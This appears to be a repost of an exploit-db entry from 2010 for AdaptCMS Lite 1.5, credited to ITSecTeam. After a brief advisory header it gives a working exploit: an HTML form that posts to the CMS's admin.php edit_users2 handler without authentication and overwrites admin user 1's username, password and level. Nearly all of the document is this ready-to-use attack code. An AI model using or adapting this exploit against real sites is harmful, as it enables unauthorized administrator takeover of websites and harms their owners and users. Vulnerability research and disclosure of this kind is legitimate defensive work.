AdaptCMS Lite 1.5 – Arbitrary Add Admin - 体验盒子

作者： ITSecTeam
日期： 2010-03-27
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/11899/
===========================================================================
( #Topic : AdaptCMS_Lite_1.5 2009-07-07
( #Bug type : change admin (user,passwd) & add new admin user exploit
( #Download :
http://sourceforge.net/projects/adaptcms/files/AdaptCMS%20Lite%20v1/1.5/AdaptCMS_Lite_1.5.zip/download
( #Advisory :
===========================================================================
( #Author : ItSecTeam
( #Email : Bug@ITSecTeam.com #
( #Website: http://www.itsecteam.com #
( #Forum : http://forum.ITSecTeam.com #
( #Original Advisory:
www.ITSecTeam.com/en/vulnerabilities/vulnerability28.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!

---------------------------------------------------------------------
exploit:

<html>
<head>
<body>
<h2>coded by ahmadbady</h2>
<form action='admin.php?view=edit_users2&id=1' method='post'>
<table cellpadding='5' cellspacing='0' border='0' width='480'
style='padding-left:5px' align='left'>
<tr><td>Username</td><td><input type='text' name='username1' size='16'
value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>New Password?</td><td><input type='text'
name='password1' size='16'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>E-Mail</td><td><input type='text' name='email1'
size='16' value='anything'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td></tr><tr><td>Level</td><td><select name='level' style='font-family:
tahoma;
font-size: 11px; border: 1px solid #444444;padding-left:1px'><option
value='Admin'
selected>Admin - Level 1</option><option value='Member'>Member - Level
3</option>
<option value='Staff'>Staff - Level 2</option></select></td></tr><tr><td>
<input type='submit' value='Update User'
style='font-family: tahoma; font-size: 11px; border: 1px solid
#444444;padding-left:1px'>
</td>
</tr></table></form> </td></tr></table>
</body>
</html>
---------------------------------------------------------------------